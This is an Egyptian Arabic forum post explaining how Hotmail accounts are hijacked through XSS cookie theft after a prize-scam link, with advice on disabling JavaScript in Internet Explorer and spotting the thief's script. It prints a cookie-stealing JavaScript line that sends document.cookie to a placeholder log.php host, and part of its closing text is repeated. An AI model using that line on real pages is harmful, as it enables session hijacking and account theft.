حماية بردك من الاختراق عبر سرقة الكوكيز
بسم الله الرحمن الرحيم
اليوم عملت شرح لموضوع سرقة بريد الهوت ميل
وهى طريقة سرقة ملف الكوكيز الخاص بيك بعد دخولك على موقع السارق
عارفين ان ثغرة xss للهوتميل اتقفلت من زمااان
لكن ظهرت ثغرات جديده حاليا وهيا برايفت عند ناس
ومناسبة الشرح ده اني لاحظت مئات الايميلات الثلاثية والثنائيات يخترقوهم هؤلاء اللي معاهم الثغرة
ماعلينا اليوم بعد ما تقرأ الموضوع ده انسى ان واحد يضحك عليك
نفترض وصلتلك رسالة على البريد مضمونها
اهلاً بك يا فلان
مبروك ربحت 10000 ريال
ادخل على الرابط التالي علشان تاخد الـ 10000 ريال
طبعا انت فرحان ودخلت علطول
وبعد ما دخلت ما لقيت شيء
ممكن تلاقي صفحة بيضة ممكن تلاقي صورة بس
تقول خسارة مليش نصيب في المبلغ
طبعا بعدها بدقايق كان المخترق جاتله رساله ملف الكوكيز تبعك
ودخل غير كل البيانات
وراح الاميل عليك طبعا انت تقول
الاميل انا كنت حميه و ماقبلتش اي حاجة من حد وكيف اميلى ينسرق
وبعدها طبعا السارق دخل سحب باقى البيانات ومنها الدومين
واخترق منتداك كمان
وكل ده من اميلك
لاااااااااااااا
خليكو معايا وانتبهو جيدا
ده مثال للرسالة اللي جاتلك وكان فيها الرابط
استنة رايح فين
هتفتحه بس بعد ما تتبع الخطوات التالية :
تعديل بسيط على اعدادات انترنت اكسبلورر
روح على tools واختار internet options اللي هو اخر خيار
بعدين تروح على security واضغط على custom level
بعد كده ابحث عن Active Scripting وهي خاصية الجافا سكربت
قم بتعطيلها من خلال اختيارك Disable
الان انت فى امان ولو فتحت الصفحة مش هينسرق ملف الكوكيز بتاعك
ادخل على الصفحة بقلب جامد بعد التاكد من ان خاصية الجافا وجعلها دسبلاي
طيب الان انت دخلت الصفحة وعاوز تتأكد اذا ده واحد هدفه يسرق ايميلك والا لأ
تعمل ايه ؟!
روح من القائمة view اختار Source
هيفتحلك مصدر الصفحة في مفكره
فيها اكواد الصفحة
طيب ابحث فيها عن الكود ده
طبعا اكيد انتم شايفين ده عباره عن كود وفى اخره رابط السكربت بتاع المخترق علشان يسرق الكوكيز
وده هو الملف بتاع سرقة الكوكيز معمول بخاصية الجافا سكربت عشان كده قلتلك عطل الجافا سكربت في المتصفح
طبعا انت شفت الرابط الى فى اخر الكود
www.xxx.com/vb/add.js
طيب دلوقتى انت عرفت المصدر
دلوقتى بقى انت عايز تحرق دمه
وتعرفه انك انسان عاقل وفاهم
ادخل على المتصفح
وحط رابط ملف سرقة الكوكيز بتاع المخترق
www.xxx.com/vb/add.js
هيطلب منك انك تحمله
حمله على جهازك
واضغط عليه كلك يمين واختار open with واختار النوت باد
طبعا انت دخلت على ملف الجافا سكربت لقيته كده
طبعا انت مش فاهم ايه ده ؟؟؟؟؟؟
اقولك انا يا سيدى
ده ملف سرقة الكوكيز
ما علينا مش هطول عليكم وهقولكم الباقى
عايز دلوقتى تجنينه وتخنقه وتخليه يشيييييييييط
lo cat ion .h ref='http://www.xxxx.com/xxx/log.php?in de x='+escape(d ocu ment.c oo kie);
طبعا هو فى الملف log.php فيه اميل المخترق
تمااام دلوقتى احنا عايزين نوصله التحية بتاعتنا ونعرفه ان لعبته اتقفشت
هتكتب
كود PHP:
www.xxxxx.com/xxx/log.php?index= وهنا اكتب الكلام الى عايزه يوصل للضحية
مثل
هذه الصورة مصغره ... نقره على هذا الشريط لعرض الصوره بالمقاس الحقيقي ... المقاس الحقيقي 766x101 .
طيب تمام
طبعا علطول بيروح تبيلغ للمخترق ان الكوكيز بتاع وصله
وهيدخل وهو مبسوط
وهيلاقى فى الرساله بدل الكوكيز الكلام بتاعك اللي انت كتبته
شوفو مثال :
طبعا هو ممكن ينفجر من الغيظ
كده خلص موضوعنا
ونصيحة للجميع
اعمل لايميلك سؤال سري واجابة
وايميل بديل يكون بتاعك علشان تسترجعه وقت اللزوم
وبرنامج حماية قوي علشان يحميك من ملفات التجسس
واهم شيء استخدام متصفح غير الاكسبلورر
ممكن تستخدمو فايرفوكس مع التحديث دائما مثلي
تحياتي للجميع
EGY-MaF!4
www.xxxxx.com/xxx/log.php?index= وهنا اكتب الكلام الى عايزه يوصل للضحية
مثل
طيب تمام
طبعا علطول بيروح تبيلغ للمخترق ان الكوكيز بتاع وصله
وهيدخل وهو مبسوط
وهيلاقى فى الرساله بدل الكوكيز الكلام بتاعك اللي انت كتبته
شوفو مثال :
طبعا هو ممكن ينفجر من الغيظ
كده خلص موضوعنا
ونصيحة للجميع
اعمل لايميلك سؤال سري واجابة
وايميل بديل يكون بتاعك علشان تسترجعه وقت اللزوم
وبرنامج حماية قوي علشان يحميك من ملفات التجسس
واهم شيء استخدام متصفح غير الاكسبلورر
تحياتي للجميع
EGY-MaF!4
التعديل الأخير:
اسم الموضوع : حماية بردك من الاختراق عبر سرقة الكوكيز
|
المصدر : قـسـم الـبـريد الإلـكتروني والحسابات العامة